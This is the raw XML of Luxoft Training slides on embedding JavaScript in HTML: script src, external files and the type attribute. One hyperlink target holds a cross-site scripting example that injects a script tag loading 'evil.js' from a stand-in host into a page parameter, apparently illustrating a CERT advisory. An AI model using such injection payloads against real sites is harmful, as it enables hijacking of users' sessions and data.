            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Edit Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Symbol zastępczy tekstu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286919" y="1196975"/>
            <a:ext cx="8593493" cy="4979988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:body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8" name="PoleTekstowe 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286919" y="6453958"/>
            <a:ext cx="1853392" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Open Sans"/>
              </a:rPr>
              <a:t>http://www.luxoft-training.ru/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Open Sans"/>
              </a:rPr>
              <a:t>© Luxoft Training. All rights reserved</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="800" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>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162638" y="6459060"/>
            <a:ext cx="720000" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168191665"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483655" r:id="rId1"/>
    <p:sldLayoutId id="2147483681" r:id="rId2"/>
    <p:sldLayoutId id="2147483692" r:id="rId3"/>
    <p:sldLayoutId id="2147483656" r:id="rId4"/>
    <p:sldLayoutId id="2147483682" r:id="rId5"/>
    <p:sldLayoutId id="2147483657" r:id="rId6"/>
    <p:sldLayoutId id="2147483683" r:id="rId7"/>
    <p:sldLayoutId id="2147483685" r:id="rId8"/>
    <p:sldLayoutId id="2147483673" r:id="rId9"/>
    <p:sldLayoutId id="2147483674" r:id="rId10"/>
    <p:sldLayoutId id="2147483675" r:id="rId11"/>
    <p:sldLayoutId id="2147483659" r:id="rId12"/>
    <p:sldLayoutId id="2147483661" r:id="rId13"/>
    <p:sldLayoutId id="2147483671" r:id="rId14"/>
    <p:sldLayoutId id="2147483672" r:id="rId15"/>
    <p:sldLayoutId id="2147483688" r:id="rId16"/>
    <p:sldLayoutId id="2147483690" r:id="rId17"/>
    <p:sldLayoutId id="2147483689" r:id="rId18"/>
    <p:sldLayoutId id="2147483660" r:id="rId19"/>
    <p:sldLayoutId id="2147483693" r:id="rId20"/>
    <p:sldLayoutId id="2147483694" r:id="rId21"/>
  </p:sldLayoutIdLst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914377" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="3000" b="1" kern="1200">
          <a:solidFill>
            <a:srgbClr val="EB571C"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
          <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="359991"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2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="685783" indent="-359991" algn="l" defTabSz="914377" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="EB571C"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="­"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1142971" indent="-359991" algn="l" defTabSz="914377" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="24447D"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="w"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600160" indent="-359991" algn="l" defTabSz="914377" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="24447D"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="­"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057349"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hyperlink" Target="http://www.example.com/greet.html?David" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://siteA/greet.html?name=%3Cscript%20src=siteB/evil.js%3E%3C/script%3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hyperlink" Target="http://www.cert.org/advisories/CA-2000-02.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WEB-007 JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Symbol zastępczy tekstu 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> ver. 1.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235105514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 JavaScript into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The &lt;script&gt; tag supports a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute that specifies the URL of a file containing JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A JavaScript file contains pure JavaScript, without &lt;script&gt; tags or any other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By convention, files of JavaScript code have names that end with .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>closing &lt;/script&gt; tag is required in HTML documents even when the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute is specified, and there is no content between the &lt;script&gt; and &lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719803" y="2179279"/>
            <a:ext cx="5748088" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"../../scripts/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>util.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1594386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 JavaScript into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are a number of advantages to using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attribute:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>simplifies your HTML files by allowing you to remove large blocks of JavaScript code from them—that is, it helps keep content and behavior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>separate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attribute allows you to maintain only a single copy of that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>only needs to be downloaded once, by the first page that uses it—subsequent pages can retrieve it from the browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>program or web page from one web server can employ code exported by other web servers. Much Internet advertising relies on this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>fact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ability to load scripts from other sites allows us to take the benefits of caching a step further: Google is promoting the use of standard well-known URLs for the most commonly used client-side libraries, allowing the browser to cache a single copy for shared use by any site across the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="515710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 JavaScript into HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript was the original scripting language for the Web and &lt;script&gt; elements are, by default, assumed to contain or to reference JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a nonstandard scripting language, such as Microsoft’s VBScript (which is supported by IE only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The default value of the type attribute is “text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Older browsers used a language attribute on the &lt;script&gt; tag instead of the type attribute. The language attribute is deprecated and should no longer be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>used</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742940" y="3347708"/>
            <a:ext cx="6931398" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>vbscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>' VBScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>goes here</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
